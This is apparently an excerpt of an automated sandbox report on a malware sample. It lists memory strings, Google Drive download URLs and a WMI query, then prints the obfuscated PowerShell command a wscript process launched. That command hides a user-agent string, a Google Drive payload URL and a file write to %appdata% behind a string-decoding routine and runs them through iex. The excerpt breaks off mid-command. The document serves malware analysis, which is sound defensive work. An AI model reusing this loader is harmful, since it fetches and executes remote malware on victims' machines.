Source: |
Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2003573234.00000000008A1000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F36000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdbGCTL source: FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000009.00000002.2003573234.0000000000904000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: stem.Core.pdbS source: powershell.exe, 00000009.00000002.2010781616.0000000006F85000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: wab.pdb source: FTSKIaM.exe, FTSKIaM.exe, 00000013.00000000.2378354849.0000000000A11000.00000020.00000001.01000000.00000008.sdmp |
Source: powershell.exe, 00000003.00000002.2240319276.000001F0A32A9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ma |
Source: powershell.exe, 00000003.00000002.2240319276.000001F0A32A9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micro |
Source: powershell.exe, 00000009.00000002.2010781616.0000000006F36000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoX |
Source: wscript.exe, 00000000.00000003.1405620829.000001A46831B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/ |
Source: wscript.exe, 00000000.00000003.1521138231.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521895044.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1520323681.000001A46635E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000000.00000002.1522074715.000001A468230000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000000.00000003.1405991772.000001A4682BB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7c9d21128d36 |
Source: wscript.exe, 00000000.00000003.1406453153.000001A4682E2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1405991772.000001A4682BB000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabP |
Source: wscript.exe, 00000000.00000003.1521138231.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521895044.000001A4663E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1520323681.000001A46635E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabme |
Source: wscript.exe, 00000000.00000003.1406453153.000001A468296000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1406310996.000001A46826E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7c9d21128 |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9C3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2224520722.000001F09AC40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ABD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2004706353.0000000004581000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ABD1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000009.00000002.2004706353.0000000004581000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C62C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ADF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C62C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08ADF7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_lyP |
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_lyXR |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B05D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1oD4tvDdy2-rKBIrZpCy_NRSR7VMtG_ly&export=download |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B05D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.comP |
Source: powershell.exe, 00000009.00000002.2004706353.00000000046D9000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08BE7F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.2224520722.000001F09AC40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2007966903.00000000055E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000003.00000002.2126865356.000001F08B059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2126865356.000001F08C9B0000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Overburdeningly = 1;$Haarrddernes='Substrin';$Haarrddernes+='g';Function Blomraadne($Suggestionen){$Kulsyre=$Suggestionen.Length-$Overburdeningly;For($Esrogs=5; $Esrogs -lt $Kulsyre; $Esrogs+=(6)){$Bilendes+=$Suggestionen.$Haarrddernes.Invoke($Esrogs, $Overburdeningly);}$Bilendes;}function Uudviklet($Sammenstuvningerne){. ($Subpellucidity) ($Sammenstuvningerne);}$Dulmes=Blomraadne 'Cha,tMRanchoBlomszCenteizonkmlUfejll halaa ,ump/ epos5.udek.duske0Delet Nonad(KvindW .elgiPrecinTrossd.kkupoUdv.kwSammesvalgb MeroNFili,TTo.ea R gar1Midta0Sildd.Ingra0d.ast;Udann .ordbW Pakki Twenn .ewy6Aands4 Flor;F tal Ori,ax Syst6A.ted4In us;Moloi Henler Ragiv Tupp:Trspr1Corne2,ehir1Pyrox.Fr sk0Misoc)Torke Ekko.G KnoweAfgifcHillekHydrooS.eln/Tabul2Optje0Sylte1 er t0 klyn0Endit1Warm,0commi1Glott SubinFHaardiMicror lipoeSpi nfDoledoVegetxphyti/Bjerg1.ntif2Chilt1Supre.Medbo0Uarb, ';$subdichotomies=Blomraadne 'Fraa.U AnfrsDr,meesoegmrLokal-AlgebATid bgomd sePr ctn UnmatKalpa ';$Rugemaskine=Blomraadne 'Brillh A lht .rogtOrchepNeedlsMedik:strib/Parel/ F icdomstbrOpiliiConcevAuriceSteps.,mertgSkydeoTyskeoDer,ig,aterlMassee Mani.Imparc Sibio E.evm.rogr/LatteuGermacAtmos?Gera,e RektxCnemipSommeoFuldvrCentrtOplad=Lepadd KoldoS delwStiplnArchblFrassoantipaCathodunder&Ph soiUnbo d P.rt= k al1depoloMys.aDDyref4RevistAgricvPrissDGua adAdipoyRever2Plump-Maskir,ddanKHartvBAtticIUoplarSpiroZStri.pPlackCId tsyrec p_UnbroNS.endR Sm.aSKar oRAssis7 ThyrV erdiMVrimltAndenGSjleh_Gl.bulForetyrehee ';$kattelemmes=Blomraadne 'Trf,e>Unr,c ';$Subpellucidity=Blomraadne ' DispiEmbele Mergx enne ';$Aluminate = Blomraadne ' atrieCatarc,laedhInd.boSiph, Rustn%t.ndra.espep,alaapFals,dAnimaaan istD.liraHygie%Br.ne\Misg STaf,faNoni.lR.nsktRneres Blanp HiemoTotaloUddatnAtt,sfEkspouVe.erl .oth.UnderD toldaPanteg,ndos nejp& Mand&Amazi shareeA.delcLegalh BagloMurha For.$Parke ';Uudviklet 
(Blomraadne 'Syge.$ HavegHaandlGe.peo PaabbKdedea nshelForka:BrndsT,orgei absulDeltrhA inauAp degBodywgSlethe NrklnPrikkd Op.seMegal=Dread(V,melcCrescmDurwaddiffu Sickl/,rgancL rdo Kant.$KorreARingdlStnd u W,gomNon ei.redinlun.eaUnwort Brn.e baga)Brynj ');Uudviklet (Blomraadne 'O.ert$BrudegBedralNig,roNonprbbiosyaAtomil Mail:BattlLMi.iseVictua kisknA.tioeRen.rr Adve=Li sf$emnetRpastouOmf,vgHypere Jo.om nnuea Embes TalmkResmiiLing.n UvureAfled.MystisTrevlpfigh |